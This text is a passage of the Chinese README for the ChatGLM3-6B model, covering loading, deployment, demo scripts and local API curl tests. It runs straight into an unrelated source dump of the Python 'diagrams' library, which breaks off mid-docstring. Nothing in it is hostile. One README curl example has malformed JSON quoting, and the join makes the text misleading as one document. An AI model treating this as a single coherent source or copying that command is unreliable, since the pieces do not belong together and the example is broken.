代码解释器模式,模型可以在一个 Jupyter 环境中执行代码并获取结果,以完成复杂任务。 <img src="resources/heart.png" width="400"> ### 代码调用 可以通过如下代码调用 ChatGLM 模型来生成对话: ``` >> from transformers import AutoTokenizer, AutoModel >> tokenizer = AutoTokenizer.from_pretrained("THUDM/chatglm3-6b", trust_remote_code=True) >> model = AutoModel.from_pretrained("THUDM/chatglm3-6b", trust_remote_code=True, device='cuda') >> model = model.eval() >> response, history = model.chat(tokenizer, "你好", history=[]) >> print(response) 你好👋!我是人工智能助手 ChatGLM3 - 6B, 很高兴见到你, 欢迎问我任何问题。 >> response, history = model.chat(tokenizer, "晚上睡不着应该怎么办", history=history) >> print(response) 晚上睡不着可能会让你感到焦虑或不舒服, 但以下是一些可以帮助你入睡的方法: 1.制定规律的睡眠时间表: 保持规律的睡眠时间表可以帮助你建立健康的睡眠习惯, 使你更容易入睡。尽量在每天的相同时间上床, 并在同一时间起床。 2.创造一个舒适的睡眠环境: 确保睡眠环境舒适, 安静, 黑暗且温度适宜。可以使用舒适的床上用品, 并保持房间通风。 3.放松身心: 在睡前做些放松的活动, 例如泡个热水澡, 听些轻柔的音乐, 阅读一些有趣的书籍等, 有助于缓解紧张和焦虑, 使你更容易入睡。 4.避免饮用含有咖啡因的饮料: 咖啡因是一种刺激性物质, 会影响你的睡眠质量。尽量避免在睡前饮用含有咖啡因的饮料, 例如咖啡, 茶和可乐。 5.避免在床上做与睡眠无关的事情: 在床上做些与睡眠无关的事情, 例如看电影, 玩游戏或工作等, 可能会干扰你的睡眠。 6.尝试呼吸技巧: 深呼吸是一种放松技巧, 可以帮助你缓解紧张和焦虑, 使你更容易入睡。试着慢慢吸气, 保持几秒钟, 然后缓慢呼气。 如果这些方法无法帮助你入睡, 你可以考虑咨询医生或睡眠专家, 寻求进一步的建议。 ``` #### 从本地加载模型 以上代码会由 `transformers` 自动下载模型实现和参数。完整的模型实现在 [Hugging Face Hub](https://huggingface.co/THUDM/chatglm3-6b) 。如果你的网络环境较差,下载模型参数可能会花费较长时间甚至失败。此时可以先将模型下载到本地,然后从本地加载。 从 Hugging Face Hub 下载模型需要先[安装Git LFS](https://docs.github.com/zh/repositories/working-with-files/managing-large-files/installing-git-large-file-storage) ,然后运行 ```Shell git clone https://huggingface.co/THUDM/chatglm3-6b ``` 如果从你从 HuggingFace 下载比较慢,也可以从 [ModelScope](https://modelscope.cn/models/ZhipuAI/chatglm3-6b) 中下载。 ### 模型微调 我们提供了一个微调 ChatGLM3-6B 模型的基础套件,可以用来微调 ChatGLM3-6B 模型。微调套件的使用方法请参考 [微调套件](finetune_demo/README.md)。 ### 网页版对话 Demo ![web-demo](resources/web-demo.gif) 可以通过以下命令启动基于 Gradio 的网页版 demo: ```shell python web_demo_gradio.py ``` ![web-demo](resources/web-demo2.png) 可以通过以下命令启动基于 Streamlit 的网页版 demo: ```shell streamlit run web_demo_streamlit.py ``` 网页版 demo 会运行一个 Web Server,并输出地址。在浏览器中打开输出的地址即可使用。 经测试,基于 Streamlit 的网页版 Demo 会更流畅。 ### 命令行对话 Demo 
![cli-demo](resources/cli-demo.png) 运行仓库中 [cli_demo.py](basic_demo/cli_demo.py): ```shell python cli_demo.py ``` 程序会在命令行中进行交互式的对话,在命令行中输入指示并回车即可生成回复,输入 `clear` 可以清空对话历史,输入 `stop` 终止程序。 ### LangChain Demo 代码实现请参考 [LangChain Demo](langchain_demo/README.md)。 #### 工具调用 关于工具调用的方法请参考 [工具调用](tools_using_demo/README.md)。 #### OpenAI API / Zhipu API Demo 我们已经推出了 OpenAI / ZhipuAI 格式的 开源模型 API 部署代码,可以作为任意基于 ChatGPT 的应用的后端。 目前,可以通过运行仓库中的 [api_server.py](openai_api_demo/api_server.py) 进行部署 ```shell cd openai_api_demo python api_server.py ``` 同时,我们也书写了一个示例代码,用来测试API调用的性能。 + OpenAI 测试脚本:[openai_api_request.py](openai_api_demo/openai_api_request.py) + ZhipuAI 测试脚本:[zhipu_api_request.py](openai_api_demo/zhipu_api_request.py) + 使用Curl进行测试 + chat Curl 测试 ```shell curl -X POST "http://127.0.0.1:8000/v1/chat/completions" \ -H "Content-Type: application/json" \ -d "{\"model\": \"chatglm3-6b\", \"messages\": [{\"role\": \"system\", \"content\": \"You are ChatGLM3, a large language model trained by Zhipu.AI. Follow the user's instructions carefully. Respond using markdown.\"}, {\"role\": \"user\", \"content\": \"你好,给我讲一个故事,大概100字\"}], \"stream\": false, \"max_tokens\": 100, \"temperature\": 0.8, \"top_p\": 0.8}" ```` + Standard openai interface agent-chat Curl 测试 ```shell curl -X POST "http://127.0.0.1:8000/v1/chat/completions" \ -H "Content-Type: application/json" \ -d "{\"model\": \"chatglm3-6b\", \"messages\": [{\"role\": \"user\", \"content\": \"37乘以8加7除2等于多少?\"}], "tools": [{"name": "track", "description": "追踪指定股票的实时价格", "parameters": {"type": "object", "properties": {"symbol": {"description": "需要追踪的股票代码"}}, "required": []}}, {"name": "Calculator", "description": "数学计算器,计算数学问题", "parameters": {"type": "object", "properties": {"symbol": {"description": "要计算的数学公式"}}, "required": []}} ], \"stream\": true, \"max_tokens\": 100, \"temperature\": 0.8, \"top_p\": 0.8}" ```` + Openai style custom interface agent-chat Curl 测试(你需要实现自定义的工具描述脚本openai_api_demo/tools/schema.py的内容,并且将api_server.py中AGENT_CONTROLLER指定为'true'): ```shell curl -X POST "http://127.0.0.1:8000/v1/chat/completions" \ -H "Content-Type: application/json" \ -d "{\"model\": \"chatglm3-6b\", \"messages\": [{\"role\": \"user\", \"content\": \"37乘以8加7除2等于多少?\"}], \"stream\": true, \"max_tokens\": 100, \"temperature\": 0.8, \"top_p\": 0.8}" ```` 该接口用于openai风格的自定义工具箱的自主调度。具有调度异常的自处理回复能力,无需另外实现调度算法,用户无需api_key。 + 使用Python进行测试 ```shell cd openai_api_demo python openai_api_request.py ``` 如果测试成功,则模型应该返回一段故事。 ## 低成本部署 ### 模型量化 默认情况下,模型以 FP16 精度加载,运行上述代码需要大概 13GB 显存。如果你的 GPU 显存有限,可以尝试以量化方式加载模型,使用方法如下: ```python model = AutoModel.from_pretrained("THUDM/chatglm3-6b", trust_remote_code=True).quantize(4).cuda() ``` 模型量化会带来一定的性能损失,经过测试,ChatGLM3-6B 在 4-bit 量化下仍然能够进行自然流畅的生成。 ### CPU 部署 如果你没有 GPU 硬件的话,也可以在 CPU 上进行推理,但是推理速度会更慢。使用方法如下(需要大概 32GB 内存) ```python model = AutoModel.from_pretrained("THUDM/chatglm3-6b", trust_remote_code=True).float() ``` ### Mac 部署 对于搭载了 Apple Silicon 或者 AMD GPU 的 Mac,可以使用 MPS 后端来在 GPU 上运行 ChatGLM3-6B。需要参考 Apple 的 [官方说明](https://developer.apple.com/metal/pytorch) 安装 PyTorch-Nightly(正确的版本号应该是2.x.x.dev2023xxxx,而不是 2.x.x)。 目前在 MacOS 上只支持[从本地加载模型](README.md#从本地加载模型)。将代码中的模型加载改为从本地加载,并使用 mps 后端: ```python model = AutoModel.from_pretrained("your local path", trust_remote_code=True).to('mps') ``` 加载半精度的 ChatGLM3-6B 模型需要大概 13GB 内存。内存较小的机器(比如 16GB 内存的 MacBook Pro),在空余内存不足的情况下会使用硬盘上的虚拟内存,导致推理速度严重变慢。 ### 多卡部署 如果你有多张 GPU,但是每张 GPU 的显存大小都不足以容纳完整的模型,那么可以将模型切分在多张GPU上。首先安装 accelerate: `pip install accelerate`,然后即可正常加载模型。 ### OpenVINO Demo ChatGLM3-6B 已经支持使用 
OpenVINO 工具包进行加速推理,在英特尔的 CPU 和 GPU 设备上有较大推理速度提升。具体使用方法请参考 [OpenVINO Demo](Intel_device_demo/openvino_demo/README.md)。

### TensorRT-LLM Demo

ChatGLM3-6B 已经支持使用 TensorRT-LLM 工具包进行加速推理,模型推理速度得到多倍的提升。具体使用方法请参考 [TensorRT-LLM Demo](tensorrt_llm_demo/tensorrt_llm_cli_demo.py) 和官方技术文档。

## 引用

如果你觉得我们的工作有帮助的话,请考虑引用下列论文。

```
@misc{glm2024chatglm,
      title={ChatGLM: A Family of Large Language Models from GLM-130B to GLM-4 All Tools},
      author={Team GLM and Aohan Zeng and Bin Xu and Bowen Wang and Chenhui Zhang and Da Yin and Diego Rojas and Guanyu Feng and Hanlin Zhao and Hanyu Lai and Hao Yu and Hongning Wang and Jiadai Sun and Jiajie Zhang and Jiale Cheng and Jiayi Gui and Jie Tang and Jing Zhang and Juanzi Li and Lei Zhao and Lindong Wu and Lucen Zhong and Mingdao Liu and Minlie Huang and Peng Zhang and Qinkai Zheng and Rui Lu and Shuaiqi Duan and Shudan Zhang and Shulin Cao and Shuxun Yang and Weng Lam Tam and Wenyi Zhao and Xiao Liu and Xiao Xia and Xiaohan Zhang and Xiaotao Gu and Xin Lv and Xinghan Liu and Xinyi Liu and Xinyue Yang and Xixuan Song and Xunkai Zhang and Yifan An and Yifan Xu and Yilin Niu and Yuantao Yang and Yueyan Li and Yushi Bai and Yuxiao Dong and Zehan Qi and Zhaoyu Wang and Zhen Yang and Zhengxiao Du and Zhenyu Hou and Zihan Wang},
      year={2024},
      eprint={2406.12793},
      archivePrefix={arXiv},
      primaryClass={cs.CL}
}
```
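Referring back to the low-cost deployment section above, the individual loading one-liners (FP16 on a single GPU, 4-bit quantization, CPU, Apple MPS, multi-GPU) can be collected into a small helper. The sketch below is illustrative and not part of the repository: the helper name and the `mode` argument are invented for clarity, while each branch uses only the calls shown in this README (`.quantize(4).cuda()`, `.float()`, `.to('mps')`) plus `device_map="auto"`, which is how `openai_api_demo/api_server.py` loads the model after `pip install accelerate`.

```python
# Illustrative helper (not part of the repo): pick one of the deployment
# variants described in the low-cost deployment section of this README.
from transformers import AutoModel, AutoTokenizer

def load_chatglm3(path="THUDM/chatglm3-6b", mode="fp16"):
    tokenizer = AutoTokenizer.from_pretrained(path, trust_remote_code=True)
    if mode == "int4":
        # 4-bit quantization: lower GPU memory use at some generation-quality cost.
        model = AutoModel.from_pretrained(path, trust_remote_code=True).quantize(4).cuda()
    elif mode == "cpu":
        # CPU inference: needs roughly 32 GB of RAM and is noticeably slower.
        model = AutoModel.from_pretrained(path, trust_remote_code=True).float()
    elif mode == "mps":
        # Apple Silicon / AMD GPU via the MPS backend; load from a local checkpoint.
        model = AutoModel.from_pretrained(path, trust_remote_code=True).to("mps")
    elif mode == "multi_gpu":
        # Split the weights across several GPUs (requires `pip install accelerate`).
        model = AutoModel.from_pretrained(path, trust_remote_code=True, device_map="auto")
    else:
        # Default: FP16 on a single GPU, roughly 13 GB of GPU memory.
        model = AutoModel.from_pretrained(path, trust_remote_code=True, device="cuda")
    return tokenizer, model.eval()

# Example: tokenizer, model = load_chatglm3(mode="int4")
```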
diagrams
4c2d8a3795d2a15a168224b2a5919c2950df679b
File: config.py # fmt: off ######################### # Application # ######################### APP_NAME = "diagrams" DIR_DOC_ROOT = "docs/nodes" DIR_APP_ROOT = "diagrams" DIR_RESOURCE = "resources" DIR_TEMPLATE = "templates" PROVIDERS = ( "base", "onprem", "aws", "azure", "digitalocean", "gcp", "ibm", "firebase", "k8s", "alibabacloud", "oci", "programming", "saas", "elastic", "generic", "openstack", "outscale", ) ######################### # Resource Processing # ######################### CMD_ROUND = "round" CMD_ROUND_OPTS = ("-w",) CMD_SVG2PNG = "inkscape" CMD_SVG2PNG_OPTS = ("-w", "256", "-h", "256", "--export-type", "png") CMD_SVG2PNG_IM = "convert" CMD_SVG2PNG_IM_OPTS = ("-shave", "25%x25%", "-resize", "256x256!") FILE_PREFIXES = { "onprem": (), "aws": ("Amazon-", "AWS-"), "azure": ("Azure-",), "digitalocean": (), "gcp": ("Cloud-",), "firebase": ("Cloud-",), "ibm": (), "k8s": (), "alibabacloud": (), "oci": ("OCI-icon-",), "programming": (), "saas": (), "elastic": (), "outscale": (), "generic": (), "openstack": (), } ######################### # Doc Auto Generation # ######################### TMPL_APIDOC = "apidoc.tmpl" ######################### # Class Auto Generation # ######################### TMPL_MODULE = "module.tmpl" UPPER_WORDS = { "aws": ("aws", "api", "ebs", "ec2", "efs", "emr", "rds", "ml", "mq", "nat", "vpc", "waf", "sdk"), "azure": ("ad", "b2c", "ai", "api", "cdn", "ddos", "dns", "fxt", "hana", "hd", "id", "sap", "sql", "vm", "vpn", "vpc"), "gcp": ("gcp", "ai", "api", "cdn", "dns", "gke", "gpu", "iap", "ml", "nat", "os", "sdk", "sql", "tpu", "vpn"), "firebase": ("ab", "fcm", "ml"), "k8s": ( "api", "cm", "ccm", "crb", "crd", "ds", "etcd", "hpa", "k8s", "ns", "psp", "pv", "pvc", "rb", "rs", "sa", "sc", "sts", "svc", ), "oci": ("oci", "ocid", "oke", "ocir", "ddos", "waf", "bm", "vm", "cdn", "vpn", "dns", "nat", "dms", "api", "id"), "elastic": ("apm", "siem", "ece", "eck", "sql"), "generic": ("vpn", "ios", "xen", "sql", "lxc"), "outscale": ("osc",), "openstack": ("rpm", "loci", "nfv", "ec2api"), "pve": ("pve"), "ibm": ("ibm"), } TITLE_WORDS = { "onprem": { "onprem": "OnPrem", }, "alibabacloud": { "alibabacloud": "AlibabaCloud" }, "aws": { "cloudfront": "CloudFront" }, "digitalocean": { "digitalocean": "DigitalOcean" }, "openstack": { "openstack": "OpenStack" }, "ibm": { "ibm": "IBMCloud" }, } # TODO: check if the classname exists ALIASES = { "onprem": { "analytics": { "Powerbi": "PowerBI" }, "ci": { "Circleci": "CircleCI", "Concourseci": "ConcourseCI", "Droneci": "DroneCI", "Gitlabci": "GitlabCI", "Travisci": "TravisCI", "Teamcity": "TC", "Zuulci": "ZuulCI", }, "container": { "Lxc": "LXC", "Rkt": "RKT", }, "database": { "Clickhouse": "ClickHouse", "Cockroachdb": "CockroachDB", "Couchdb": "CouchDB", "Hbase": "HBase", "Influxdb": "InfluxDB", "Janusgraph": "JanusGraph", "Mariadb": "MariaDB", "Mongodb": "MongoDB", "Mssql": "MSSQL", "Mysql": "MySQL", "Postgresql": "PostgreSQL", }, "gitops": { "Argocd": "ArgoCD", }, "logging": { "Fluentbit": "FluentBit", "Rsyslog": "RSyslog", }, "network": { "Etcd": "ETCD", "Haproxy": "HAProxy", "OpenServiceMesh": "OSM", "Opnsense": "OPNSense", "Pfsense": "PFSense", "Vyos": "VyOS" }, "proxmox": { "Pve": "ProxmoxVE", }, "queue": { "Activemq": "ActiveMQ", "Emqx": "EMQX", "Rabbitmq": "RabbitMQ", "Zeromq": "ZeroMQ", }, "storage": { "Ceph": "CEPH", "CephOsd": "CEPH_OSD", }, "workflow": { "Kubeflow": "KubeFlow", "Nifi": "NiFi", } }, "aws": { "analytics": { "ElasticsearchService": "ES", }, "business": { "AlexaForBusiness": "A4B" }, "blockchain": { 
"QuantumLedgerDatabaseQldb": "QLDB" }, "compute": { "ApplicationAutoScaling": "AutoScaling", "EC2Ami": "AMI", "EC2ContainerRegistry": "ECR", "ElasticBeanstalk": "EB", "ElasticContainerService": "ECS", "ElasticKubernetesService": "EKS", "ServerlessApplicationRepository": "SAR", }, "database": { "DatabaseMigrationService": "DMS", "DocumentdbMongodbCompatibility": "DocumentDB", "DynamodbDax": "DAX", "DynamodbGlobalSecondaryIndex": "DynamodbGSI", "Database": "DB", "Dynamodb": "DDB", "Elasticache": "ElastiCache", "QuantumLedgerDatabaseQldb": "QLDB", }, "devtools": { "CommandLineInterface": "CLI", "DeveloperTools": "DevTools", }, "engagement": { "SimpleEmailServiceSes": "SES", }, "general": { "GenericOfficeBuilding": "OfficeBuilding", }, "integration": { "SimpleNotificationServiceSns": "SNS", "SimpleQueueServiceSqs": "SQS", "StepFunctions": "SF", }, "iot": { "Freertos": "FreeRTOS", "IotHardwareBoard": "IotBoard", }, "management": { "SystemsManager": "SSM", "SystemsManagerParameterStore": "ParameterStore", }, "migration": { "ApplicationDiscoveryService": "ADS", "CloudendureMigration": "CEM", "DatabaseMigrationService": "DMS", "MigrationAndTransfer": "MAT", "ServerMigrationService": "SMS", }, "ml": { "DeepLearningContainers": "DLC", }, "network": { "CloudFront": "CF", "ElasticLoadBalancing": "ELB", "ElbApplicationLoadBalancer": "ALB", "ElbClassicLoadBalancer": "CLB", "ElbNetworkLoadBalancer": "NLB", "GlobalAccelerator": "GAX", }, "security": { "CertificateManager": "ACM", "Cloudhsm": "CloudHSM", "DirectoryService": "DS", "FirewallManager": "FMS", "IdentityAndAccessManagementIamAccessAnalyzer": "IAMAccessAnalyzer", "IdentityAndAccessManagementIamAWSSts": "IAMAWSSts", "IdentityAndAccessManagementIamPermissions": "IAMPermissions", "IdentityAndAccessManagementIamRole": "IAMRole", "IdentityAndAccessManagementIam": "IAM", "KeyManagementService": "KMS", "ResourceAccessManager": "RAM", }, "storage": { "CloudendureDisasterRecovery": "CDR", "ElasticBlockStoreEBS": "EBS", "ElasticFileSystemEFS": "EFS", "Fsx": "FSx", "SimpleStorageServiceS3": "S3", }, }, "azure": { "compute": { "ContainerRegistries": "ACR", "KubernetesServices": "AKS", "VMScaleSet": "VMSS" }, }, "gcp": { "analytics": { "Bigquery": "BigQuery", "Pubsub": "PubSub", }, "compute": { "AppEngine": "GAE", "Functions": "GCF", "ComputeEngine": "GCE", "KubernetesEngine": "GKE", }, "database": { "Bigtable": "BigTable", }, "devtools": { "ContainerRegistry": "GCR", }, "ml": { "Automl": "AutoML", "NaturalLanguageAPI": "NLAPI", "SpeechToText": "STT", "TextToSpeech": "TTS", }, "network": { "VirtualPrivateCloud": "VPC" }, "security": { "KeyManagementService": "KMS", "SecurityCommandCenter": "SCC", }, "storage": { "Storage": "GCS", }, }, "firebase": { "grow": { "Messaging": "FCM" } }, "k8s": { "clusterconfig": { "Limits": "LimitRange", "HPA": "HorizontalPodAutoscaler", }, "compute": { "Deploy": "Deployment", "DS": "DaemonSet", "RS": "ReplicaSet", "STS": "StatefulSet" }, "controlplane": { "API": "APIServer", "CM": "ControllerManager", "KProxy": "KubeProxy", "Sched": "Scheduler", }, "group": { "NS": "Namespace", }, "network": { "Ep": "Endpoint", "Ing": "Ingress", "Netpol": "NetworkPolicy", "SVC": "Service", }, "podconfig": { "CM": "ConfigMap", }, "rbac": { "CRole": "ClusterRole", "CRB": "ClusterRoleBinding", "RB": "RoleBinding", "SA": "ServiceAccount", }, "storage": { "PV": "PersistentVolume", "PVC": "PersistentVolumeClaim", "SC": "StorageClass", "Vol": "Volume", }, }, "alibabacloud": { "application": { "LogService": "SLS", "MessageNotificationService": "MNS", 
"PerformanceTestingService": "PTS", "SmartConversationAnalysis": "SCA", }, "compute": { "AutoScaling": "ESS", "ElasticComputeService": "ECS", "ElasticContainerInstance": "ECI", "ElasticHighPerformanceComputing": "EHPC", "FunctionCompute": "FC", "OperationOrchestrationService": "OOS", "ResourceOrchestrationService": "ROS", "ServerLoadBalancer": "SLB", "ServerlessAppEngine": "SAE", "SimpleApplicationServer": "SAS", "WebAppService": "WAS", }, "database": { "DataManagementService": "DMS", "DataTransmissionService": "DTS", "DatabaseBackupService": "DBS", "DisributeRelationalDatabaseService": "DRDS", "GraphDatabaseService": "GDS", "RelationalDatabaseService": "RDS", }, "network": { "CloudEnterpriseNetwork": "CEN", "ElasticIpAddress": "EIP", "ServerLoadBalancer": "SLB", "VirtualPrivateCloud": "VPC", }, "security": { "AntiBotService": "ABS", "AntifraudService": "AS", "CloudFirewall": "CFW", "ContentModeration": "CM", "DataEncryptionService": "DES", "WebApplicationFirewall": "WAF", }, "storage": { "FileStorageHdfs": "HDFS", "FileStorageNas": "NAS", "HybridBackupRecovery": "HBR", "HybridCloudDisasterRecovery": "HDR", "ObjectStorageService": "OSS", "ObjectTableStore": "OTS", } }, "digitalocean": {}, "oci": { "compute": { "VM": "VirtualMachine", "VMWhite": "VirtualMachineWhite", "BM": "BareMetal", "BMWhite": "BareMetalWhite", "OCIR": "OCIRegistry", "OCIRWhite": "OCIRegistryWhite", "OKE": "ContainerEngine", "OKEWhite": "ContainerEngineWhite", }, "database": { "Autonomous": "ADB", "AutonomousWhite": "ADBWhite", "DatabaseService": "DBService", "DatabaseServiceWhite": "DBServiceWhite", } }, "programming": { "framework": { "Fastapi": "FastAPI", "Graphql": "GraphQL" }, "language": { "Javascript": "JavaScript", "Nodejs": "NodeJS", "Php": "PHP", "Typescript": "TypeScript" }, }, "saas": { "logging": { "Datadog": "DataDog", "Newrelic": "NewRelic" } }, "elastic": { "elasticsearch": { "Elasticsearch": "ElasticSearch", "Logstash": "LogStash", "MachineLearning": "ML", } }, "outscale": { "Osc": "OSC", }, "ibm": {}, "generic": {}, "openstack": { "user": { "Openstackclient": "OpenStackClient", }, "billing": { "Cloudkitty": "CloudKitty", }, "deployment": { "Kolla": "KollaAnsible", "Tripleo": "TripleO", } }, } File: diagrams/__init__.py import contextvars import os import uuid from pathlib import Path from typing import Dict, List, Optional, Union from graphviz import Digraph # Global contexts for a diagrams and a cluster. # # These global contexts are for letting the clusters and nodes know # where context they are belong to. So the all clusters and nodes does # not need to specify the current diagrams or cluster via parameters. 
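# For example (illustrative sketch, not part of the library source): code like
#
#     with Diagram("web"):
#         with Cluster("services"):
#             Node("a") >> Node("b")
#
# never passes the diagram or cluster objects around explicitly. Diagram and
# Cluster store themselves in the context variables below on __enter__, and
# Node/Cluster read them back via getdiagram()/getcluster() at construction time.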
__diagram = contextvars.ContextVar("diagrams") __cluster = contextvars.ContextVar("cluster") def getdiagram() -> "Diagram": try: return __diagram.get() except LookupError: return None def setdiagram(diagram: "Diagram"): __diagram.set(diagram) def getcluster() -> "Cluster": try: return __cluster.get() except LookupError: return None def setcluster(cluster: "Cluster"): __cluster.set(cluster) class Diagram: __directions = ("TB", "BT", "LR", "RL") __curvestyles = ("ortho", "curved") __outformats = ("png", "jpg", "svg", "pdf", "dot") # fmt: off _default_graph_attrs = { "pad": "2.0", "splines": "ortho", "nodesep": "0.60", "ranksep": "0.75", "fontname": "Sans-Serif", "fontsize": "15", "fontcolor": "#2D3436", } _default_node_attrs = { "shape": "box", "style": "rounded", "fixedsize": "true", "width": "1.4", "height": "1.4", "labelloc": "b", # imagepos attribute is not backward compatible # TODO: check graphviz version to see if "imagepos" is available >= 2.40 # https://github.com/xflr6/graphviz/blob/master/graphviz/backend.py#L248 # "imagepos": "tc", "imagescale": "true", "fontname": "Sans-Serif", "fontsize": "13", "fontcolor": "#2D3436", } _default_edge_attrs = { "color": "#7B8894", } # fmt: on # TODO: Label position option # TODO: Save directory option (filename + directory?) def __init__( self, name: str = "", filename: str = "", direction: str = "LR", curvestyle: str = "ortho", outformat: str = "png", autolabel: bool = False, show: bool = True, strict: bool = False, graph_attr: Optional[dict] = None, node_attr: Optional[dict] = None, edge_attr: Optional[dict] = None, ): """Diagram represents a global diagrams context. :param name: Diagram name. It will be used for output filename if the filename isn't given. :param filename: The output filename, without the extension (.png). If not given, it will be generated from the name. :param direction: Data flow direction. Default is 'left to right'. :param curvestyle: Curve bending style. One of "ortho" or "curved". :param outformat: Output file format. Default is 'png'. :param show: Open generated image after save if true, just only save otherwise. :param graph_attr: Provide graph_attr dot config attributes. :param node_attr: Provide node_attr dot config attributes. :param edge_attr: Provide edge_attr dot config attributes. :param strict: Rendering should merge multi-edges. """ if graph_attr is None: graph_attr = {} if node_attr is None: node_attr = {} if edge_attr is None: edge_attr = {} self.name = name if not name and not filename: filename = "diagrams_image" elif not filename: filename = "_".join(self.name.split()).lower() self.filename = filename self.dot = Digraph(self.name, filename=self.filename, strict=strict) # Set attributes. 
for k, v in self._default_graph_attrs.items(): self.dot.graph_attr[k] = v self.dot.graph_attr["label"] = self.name for k, v in self._default_node_attrs.items(): self.dot.node_attr[k] = v for k, v in self._default_edge_attrs.items(): self.dot.edge_attr[k] = v if not self._validate_direction(direction): raise ValueError(f'"{direction}" is not a valid direction') self.dot.graph_attr["rankdir"] = direction if not self._validate_curvestyle(curvestyle): raise ValueError(f'"{curvestyle}" is not a valid curvestyle') self.dot.graph_attr["splines"] = curvestyle if isinstance(outformat, list): for one_format in outformat: if not self._validate_outformat(one_format): raise ValueError(f'"{one_format}" is not a valid output format') else: if not self._validate_outformat(outformat): raise ValueError(f'"{outformat}" is not a valid output format') self.outformat = outformat # Merge passed in attributes self.dot.graph_attr.update(graph_attr) self.dot.node_attr.update(node_attr) self.dot.edge_attr.update(edge_attr) self.show = show self.autolabel = autolabel def __str__(self) -> str: return str(self.dot) def __enter__(self): setdiagram(self) return self def __exit__(self, exc_type, exc_value, traceback): self.render() # Remove the graphviz file leaving only the image. os.remove(self.filename) setdiagram(None) def _repr_png_(self): return self.dot.pipe(format="png") def _validate_direction(self, direction: str) -> bool: return direction.upper() in self.__directions def _validate_curvestyle(self, curvestyle: str) -> bool: return curvestyle.lower() in self.__curvestyles def _validate_outformat(self, outformat: str) -> bool: return outformat.lower() in self.__outformats def node(self, nodeid: str, label: str, **attrs) -> None: """Create a new node.""" self.dot.node(nodeid, label=label, **attrs) def connect(self, node: "Node", node2: "Node", edge: "Edge") -> None: """Connect the two Nodes.""" self.dot.edge(node.nodeid, node2.nodeid, **edge.attrs) def subgraph(self, dot: Digraph) -> None: """Create a subgraph for clustering""" self.dot.subgraph(dot) def render(self) -> None: if isinstance(self.outformat, list): for one_format in self.outformat: self.dot.render(format=one_format, view=self.show, quiet=True) else: self.dot.render(format=self.outformat, view=self.show, quiet=True) class Cluster: __directions = ("TB", "BT", "LR", "RL") __bgcolors = ("#E5F5FD", "#EBF3E7", "#ECE8F6", "#FDF7E3") # fmt: off _default_graph_attrs = { "shape": "box", "style": "rounded", "labeljust": "l", "pencolor": "#AEB6BE", "fontname": "Sans-Serif", "fontsize": "12", } # fmt: on # FIXME: # Cluster direction does not work now. Graphviz couldn't render # correctly for a subgraph that has a different rank direction. def __init__( self, label: str = "cluster", direction: str = "LR", graph_attr: Optional[dict] = None, ): """Cluster represents a cluster context. :param label: Cluster label. :param direction: Data flow direction. Default is 'left to right'. :param graph_attr: Provide graph_attr dot config attributes. """ if graph_attr is None: graph_attr = {} self.label = label self.name = "cluster_" + self.label self.dot = Digraph(self.name) # Set attributes. for k, v in self._default_graph_attrs.items(): self.dot.graph_attr[k] = v self.dot.graph_attr["label"] = self.label if not self._validate_direction(direction): raise ValueError(f'"{direction}" is not a valid direction') self.dot.graph_attr["rankdir"] = direction # Node must be belong to a diagrams. 
self._diagram = getdiagram() if self._diagram is None: raise EnvironmentError("Global diagrams context not set up") self._parent = getcluster() # Set cluster depth for distinguishing the background color self.depth = self._parent.depth + 1 if self._parent else 0 coloridx = self.depth % len(self.__bgcolors) self.dot.graph_attr["bgcolor"] = self.__bgcolors[coloridx] # Merge passed in attributes self.dot.graph_attr.update(graph_attr) def __enter__(self): setcluster(self) return self def __exit__(self, exc_type, exc_value, traceback): if self._parent: self._parent.subgraph(self.dot) else: self._diagram.subgraph(self.dot) setcluster(self._parent) def _validate_direction(self, direction: str) -> bool: return direction.upper() in self.__directions def node(self, nodeid: str, label: str, **attrs) -> None: """Create a new node in the cluster.""" self.dot.node(nodeid, label=label, **attrs) def subgraph(self, dot: Digraph) -> None: self.dot.subgraph(dot) class Node: """Node represents a node for a specific backend service.""" _provider = None _type = None _icon_dir = None _icon = None _height = 1.9 def __init__(self, label: str = "", *, nodeid: str = None, **attrs: Dict): """Node represents a system component. :param label: Node label. """ # Generates an ID for identifying a node, unless specified self._id = nodeid or self._rand_id() self.label = label # Node must be belong to a diagrams. self._diagram = getdiagram() if self._diagram is None: raise EnvironmentError("Global diagrams context not set up") if self._diagram.autolabel: prefix = self.__class__.__name__ if self.label: self.label = prefix + "\n" + self.label else: self.label = prefix # fmt: off # If a node has an icon, increase the height slightly to avoid # that label being spanned between icon image and white space. # Increase the height by the number of new lines included in the label. padding = 0.4 * (self.label.count('\n')) self._attrs = { "shape": "none", "height": str(self._height + padding), "image": self._load_icon(), } if self._icon else {} # fmt: on self._attrs.update(attrs) self._cluster = getcluster() # If a node is in the cluster context, add it to cluster. 
if self._cluster: self._cluster.node(self._id, self.label, **self._attrs) else: self._diagram.node(self._id, self.label, **self._attrs) def __repr__(self): _name = self.__class__.__name__ return f"<{self._provider}.{self._type}.{_name}>" def __sub__(self, other: Union["Node", List["Node"], "Edge"]): """Implement Self - Node, Self - [Nodes] and Self - Edge.""" if isinstance(other, list): for node in other: self.connect(node, Edge(self)) return other elif isinstance(other, Node): return self.connect(other, Edge(self)) else: other.node = self return other def __rsub__(self, other: Union[List["Node"], List["Edge"]]): """Called for [Nodes] and [Edges] - Self because list don't have __sub__ operators.""" for o in other: if isinstance(o, Edge): o.connect(self) else: o.connect(self, Edge(self)) return self def __rshift__(self, other: Union["Node", List["Node"], "Edge"]): """Implements Self >> Node, Self >> [Nodes] and Self Edge.""" if isinstance(other, list): for node in other: self.connect(node, Edge(self, forward=True)) return other elif isinstance(other, Node): return self.connect(other, Edge(self, forward=True)) else: other.forward = True other.node = self return other def __lshift__(self, other: Union["Node", List["Node"], "Edge"]): """Implements Self << Node, Self << [Nodes] and Self << Edge.""" if isinstance(other, list): for node in other: self.connect(node, Edge(self, reverse=True)) return other elif isinstance(other, Node): return self.connect(other, Edge(self, reverse=True)) else: other.reverse = True return other.connect(self) def __rrshift__(self, other: Union[List["Node"], List["Edge"]]): """Called for [Nodes] and [Edges] >> Self because list don't have __rshift__ operators.""" for o in other: if isinstance(o, Edge): o.forward = True o.connect(self) else: o.connect(self, Edge(self, forward=True)) return self def __rlshift__(self, other: Union[List["Node"], List["Edge"]]): """Called for [Nodes] << Self because list of Nodes don't have __lshift__ operators.""" for o in other: if isinstance(o, Edge): o.reverse = True o.connect(self) else: o.connect(self, Edge(self, reverse=True)) return self @property def nodeid(self): return self._id # TODO: option for adding flow description to the connection edge def connect(self, node: "Node", edge: "Edge"): """Connect to other node. :param node: 